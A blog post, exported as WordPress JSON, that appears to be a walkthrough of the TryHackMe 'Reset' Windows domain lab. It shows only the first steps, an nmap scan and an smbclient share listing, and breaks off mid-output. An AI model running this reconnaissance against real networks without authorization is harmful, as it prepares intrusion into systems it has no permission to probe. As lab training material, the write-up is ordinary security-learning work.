{"id":359,"date":"2024-01-28T20:44:17","date_gmt":"2024-01-29T02:44:17","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=359"},"modified":"2024-04-16T20:55:10","modified_gmt":"2024-04-17T01:55:10","slug":"tryhackme-reset","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/","title":{"rendered":"TryHackMe: Reset"},"content":{"rendered":"\n<p><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><a href=\"https:\/\/tryhackme.com\/room\/resetui\" target=\"_blank\" rel=\"noopener noreferrer nofollow\" title=\"Reset \">Reset <\/a><\/mark><\/strong>is a Windows machine that is part of a domain and consists of many misconfigurations. Our goal is to perform a Pentest as a Red Teamer and exploit the misconfigurations to become the Administrator on the machine.<\/p>\n\n\n\n<p>We will begin our enumeration with NMAP as usual.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">NMAP<\/mark><\/h4>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset]\n\u2514\u2500$ nmap -p53,135,139,445,464,636,3268,3269,3389,5985,7680,9389,49671,49673,49703 10.10.105.191 -A -oN nmap\/reset -Pn\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-01-27 08:41 CST\nNmap scan report for 10.10.105.191\nHost is up (0.21s latency).\n\nPORT      STATE SERVICE       VERSION\n53\/tcp    open  domain        Simple DNS Plus\n88\/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-27 20:59:53Z)\n135\/tcp   open  msrpc         Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n445\/tcp   open  microsoft-ds?\n464\/tcp   open  kpasswd5?\n636\/tcp   open  tcpwrapped\n3268\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)\n3269\/tcp  open  tcpwrapped\n3389\/tcp  open  ms-wbt-server Microsoft Terminal Services\n| ssl-cert: Subject: commonName=HayStack.thm.corp\n| Not valid before: 2024-01-25T21:01:31\n|_Not valid after:  2024-07-26T21:01:31\n| rdp-ntlm-info: \n|   Target_Name: THM\n|   NetBIOS_Domain_Name: THM\n|   NetBIOS_Computer_Name: HAYSTACK\n|   DNS_Domain_Name: thm.corp\n|   DNS_Computer_Name: HayStack.thm.corp\n|   DNS_Tree_Name: thm.corp\n|   Product_Version: 10.0.17763\n|_  System_Time: 2024-01-27T14:42:00+00:00\n|_ssl-date: 2024-01-27T14:42:40+00:00; -1s from scanner time.\n5985\/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n7680\/tcp  open  pando-pub?\n9389\/tcp  open  mc-nmf        .NET Message Framing\n49671\/tcp open  msrpc         Microsoft Windows RPC\n49673\/tcp open  msrpc         Microsoft Windows RPC\n49703\/tcp open  msrpc         Microsoft Windows RPC\nService Info: Host: HAYSTACK; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n| smb2-time: \n|   date: 2024-01-27T14:42:00\n|_  start_date: N\/A\n|_clock-skew: mean: -1s, deviation: 0s, median: -1s\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p53,135,139,445,464,636,3268,3269,3389,5985,7680,9389,49671,49673,49703<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.105.191<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-A<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-oN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap\/reset<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-Pn<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7.94<\/span><span style=\"color: #C3E88D\">SVN<\/span><span style=\"color: #BABED8\"> ( <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org<\/span><span style=\"color: #BABED8\"> ) at 2024-01-27 08:41 CST<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">scan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">report<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.105.191<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #BABED8\"> (0.21s <\/span><span style=\"color: #C3E88D\">latency<\/span><span style=\"color: #BABED8\">).<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">PORT<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">STATE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SERVICE<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">53\/tcp<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">domain<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #C3E88D\">Simple<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DNS<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Plus<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">88\/tcp<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">kerberos-sec<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Kerberos<\/span><span style=\"color: #BABED8\"> (server <\/span><span style=\"color: #C3E88D\">time:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-01-27<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">20<\/span><span style=\"color: #C3E88D\">:59:53Z<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">135\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">139\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">netbios-ssn<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">netbios-ssn<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">445\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">microsoft-ds?<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">464\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">kpasswd5?<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">636\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">tcpwrapped<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">3268\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">ldap<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Active<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Directory<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LDAP<\/span><span style=\"color: #BABED8\"> (Domain: <\/span><span style=\"color: #C3E88D\">thm.corp0.,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Site:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Default-First-Site-Name<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">3269\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">tcpwrapped<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">3389\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">ms-wbt-server<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Terminal<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Services<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssl-cert:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Subject:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">commonName=HayStack.thm.corp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">before:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-01-25T21:01:31<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">after:<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-07-26T21:01:31<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">rdp-ntlm-info:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Target_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">THM<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">NetBIOS_Domain_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">THM<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">NetBIOS_Computer_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HAYSTACK<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNS_Domain_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thm.corp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNS_Computer_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HayStack.thm.corp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNS_Tree_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thm.corp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Product_Version:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.0<\/span><span style=\"color: #C3E88D\">.17763<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">System_Time:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-01-27T14:42:00+00:00<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_ssl-date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-01-27T14:42:40+00:00<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">-1s<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">from<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">scanner<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">time.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">5985\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HTTPAPI<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">httpd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\"> (SSDP\/UPnP)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-server-header:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Microsoft-HTTPAPI\/2.0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">7680\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">pando-pub?<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">9389\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">mc-nmf<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #C3E88D\">.NET<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Message<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Framing<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49671\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49673\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49703\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Service<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Info:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Host:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HAYSTACK<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">OS:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">CPE:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cpe:\/o:microsoft:windows<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">script<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">results:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">smb2-security-mode:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">3:1:1:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">Message<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">signing<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">enabled<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">and<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">required<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">smb2-time:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-01-27T14:42:00<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">start_date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">N\/A<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_clock-skew:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mean:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-1s,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">deviation:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #C3E88D\">s,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">median:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-1s<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>We will begin with enumerating SMB.<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset]\n\u2514\u2500$ smbclient -L \\\\\\\\10.10.77.111\\\\\nPassword for [WORKGROUP\\ishsome]:\n\n\tSharename       Type      Comment\n\t---------       ----      -------\n\tADMIN$          Disk      Remote Admin\n\tC$              Disk      Default share\n\tData            Disk      \n\tIPC$            IPC       Remote IPC\n\tNETLOGON        Disk      Logon server share \n\tSYSVOL          Disk      Logon server share \nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 10.10.77.111 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">smbclient<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-L<\/span><span style=\"color: #BABED8\"> \\\\\\\\<\/span><span style=\"color: #C3E88D\">10.10.77.111<\/span><span style=\"color: #BABED8\">\\\\<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">Password <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> [WORKGROUP\\ishsome]:<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #FFCB6B\">Sharename<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">Type<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">Comment<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #FFCB6B\">---------<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">----<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">-------<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #FFCB6B\">ADMIN$<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">Disk<\/span><span style=\"color: 